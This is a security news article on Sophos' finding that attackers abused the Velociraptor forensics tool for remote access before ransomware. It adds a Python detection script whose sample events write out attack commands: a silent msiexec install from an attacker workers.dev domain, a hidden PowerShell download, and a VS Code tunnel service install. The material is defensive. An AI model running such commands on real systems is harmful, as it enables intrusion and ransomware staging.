
Attackers Turn Velociraptor Into Backdoor for Ransomware Deployment by Husain Parvez

Published on: September 4, 2025

Sophos researchers have uncovered a new twist in attacker tradecraft: the abuse of Velociraptor, a legitimate open-source digital forensics and incident response (DFIR) tool, to gain remote access and establish persistence on compromised systems. The discovery highlights how software built for defenders, and therefore signed, trusted and often allow-listed, can be flipped into an offensive asset.

According to Sophos’ Counter Threat Unit (CTU), “In this incident, the threat actor used the tool to download and execute Visual Studio Code with the likely intention of creating a tunnel to an attacker-controlled command and control (C2) server.” The technique triggered a Taegis alert when Visual Studio Code’s tunneling option was enabled, a feature that has been misused by multiple threat groups in the past.

Investigators say the attack began with the Windows msiexec utility fetching an installer from a Cloudflare Workers domain (msiexec accepts a URL as the package path, so no separate download step is needed). The domain appeared to host staging files, including Velociraptor, Cloudflare Tunnel, and the Radmin remote administration tool.

Once Velociraptor was installed and configured to talk to an attacker-controlled C2 domain, the attacker used it to run PowerShell, which downloaded Visual Studio Code from the same location and ran it as a service with its tunnel feature enabled. Further malware payloads were then retrieved using msiexec. Sophos concluded the activity “would likely have led to ransomware deployment” if not detected in time.

This marks an escalation from the more familiar abuse of remote monitoring and management (RMM) tools. As Sophos explained, “Organizations should monitor for and investigate unauthorized use of Velociraptor and treat observations of this tradecraft as a precursor to ransomware.” The warning underscores that tracking traditional malware is no longer enough: because Velociraptor is legitimate, signed software, reputation- and signature-based controls will not flag it on their own, so detection has to key on who installed it, where it was fetched from, and which server it is configured to report to.

Sophos has mapped the infrastructure used in the campaign to the Cloudflare Workers domains files[.]qaubctgg[.]workers[.]dev and velo[.]qaubctgg[.]workers[.]dev. Security teams are urged to block and retrospectively hunt for these indicators, and to run endpoint detection and response tooling capable of flagging the chain as a whole: msiexec pulling a package from a workers.dev URL, a Velociraptor client appearing on a host where the IR team never deployed one, and Visual Studio Code launched with its tunnel option.
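To make the detection advice above concrete, here is an added example (written for this page, not code from Sophos, Velociraptor or Microsoft) that turns the attack chain described in the paragraphs on msiexec, Velociraptor and the VS Code tunnel, together with the indicators just listed, into correlation rules over process-creation events. The event fields, the allow-list of hosts where Velociraptor is legitimately deployed, the host names and every command line in the sample data are constructed assumptions for illustration; only the two workers.dev domains come from the article.

```python
"""Correlation rules for the Velociraptor-abuse chain (added example).

Runs over constructed Sysmon-style process-creation records. Field names,
host names, command lines and the allow-list are assumptions, not data from
the incident; only the two IOC domains are from the article.
"""
import re
from dataclasses import dataclass

# Indicators from the article, refanged so they match URLs in command lines.
IOC_DOMAINS = {"files.qaubctgg.workers.dev", "velo.qaubctgg.workers.dev"}

# Hypothetical allow-list: hosts where the IR team really runs Velociraptor.
# A Velociraptor client anywhere else is "unauthorized" for this rule set.
AUTHORIZED_VELOCIRAPTOR_HOSTS = {"ir-jumpbox01"}


@dataclass
class ProcEvent:
    host: str
    image: str         # full path of the created process
    cmdline: str
    parent_image: str  # full path of the parent process


@dataclass
class Alert:
    host: str
    rule: str
    evidence: str


URL_RE = re.compile(r"https?://([a-z0-9.-]+)", re.IGNORECASE)


def _basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _url_hosts(cmdline):
    return {m.group(1).lower() for m in URL_RE.finditer(cmdline)}


def rule_msiexec_remote_install(ev):
    """msiexec installing straight from a URL; stronger hit on a known IOC."""
    if _basename(ev.image) != "msiexec.exe":
        return None
    hosts = _url_hosts(ev.cmdline)
    if not hosts:
        return None
    ioc = sorted(h for h in hosts if h in IOC_DOMAINS or h.endswith(".workers.dev"))
    if ioc:
        return Alert(ev.host, "msiexec_remote_install_ioc", ", ".join(ioc))
    return Alert(ev.host, "msiexec_remote_install", ", ".join(sorted(hosts)))


def rule_unauthorized_velociraptor(ev):
    """Velociraptor client running on a host the IR team never deployed to."""
    if _basename(ev.image) != "velociraptor.exe":
        return None
    if ev.host.lower() in AUTHORIZED_VELOCIRAPTOR_HOSTS:
        return None
    return Alert(ev.host, "unauthorized_velociraptor", ev.cmdline)


def rule_velociraptor_spawns_downloader(ev):
    """Velociraptor launching PowerShell that reaches out to a URL."""
    if _basename(ev.parent_image) != "velociraptor.exe":
        return None
    if _basename(ev.image) not in {"powershell.exe", "pwsh.exe"}:
        return None
    if _url_hosts(ev.cmdline):
        return Alert(ev.host, "velociraptor_spawned_downloader", ev.cmdline)
    return None


def rule_vscode_tunnel(ev):
    """VS Code started with its remote tunnel subcommand ('code tunnel ...')."""
    if _basename(ev.image) != "code.exe":
        return None
    if re.search(r"(^|\s)tunnel(\s|$)", ev.cmdline, re.IGNORECASE):
        return Alert(ev.host, "vscode_tunnel", ev.cmdline)
    return None


RULES = (rule_msiexec_remote_install, rule_unauthorized_velociraptor,
         rule_velociraptor_spawns_downloader, rule_vscode_tunnel)


def detect(events):
    """Apply every rule to every event; return all alerts in event order."""
    return [a for ev in events for a in (r(ev) for r in RULES) if a]


def precursor_hosts(events):
    """Hosts with an unauthorized Velociraptor client plus any other stage of
    the chain, which the article says should be treated as pre-ransomware."""
    by_host = {}
    for a in detect(events):
        by_host.setdefault(a.host, set()).add(a.rule)
    return sorted(h for h, rules in by_host.items()
                  if "unauthorized_velociraptor" in rules and len(rules) > 1)


# Constructed sample telemetry (assumed command-line syntax, not captured data).
SAMPLE_EVENTS = [
    ProcEvent("ws-finance-07", r"C:\Windows\System32\msiexec.exe",
              "msiexec.exe /i https://files.qaubctgg.workers.dev/v.msi /qn",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent("ws-finance-07", r"C:\Program Files\Velociraptor\velociraptor.exe",
              "velociraptor.exe --config client.config.yaml client",
              r"C:\Windows\System32\services.exe"),
    ProcEvent("ws-finance-07", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -c \"iwr https://files.qaubctgg.workers.dev/code.zip -OutFile C:\\ProgramData\\code.zip\"",
              r"C:\Program Files\Velociraptor\velociraptor.exe"),
    ProcEvent("ws-finance-07", r"C:\ProgramData\code\code.exe",
              "\"C:\\ProgramData\\code\\code.exe\" tunnel service install --accept-server-license-terms",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcEvent("ir-jumpbox01", r"C:\Program Files\Velociraptor\velociraptor.exe",
              "velociraptor.exe --config client.config.yaml client",
              r"C:\Windows\System32\services.exe"),
    ProcEvent("dev-box-12", r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\code.exe",
              "code.exe --new-window C:\\src", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"{alert.host}: {alert.rule}: {alert.evidence}")
    print("ransomware-precursor hosts:", precursor_hosts(SAMPLE_EVENTS))
```

On the sample data the finance workstation trips all four rules and is the only host reported by `precursor_hosts`; the authorized jump box running the same Velociraptor command line and the developer box running VS Code without the tunnel subcommand stay silent. In production the allow-list would come from the IR team's deployment inventory and, ideally, the rule would also compare the client's configured server against the organization's own Velociraptor frontend rather than trusting the host name alone.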
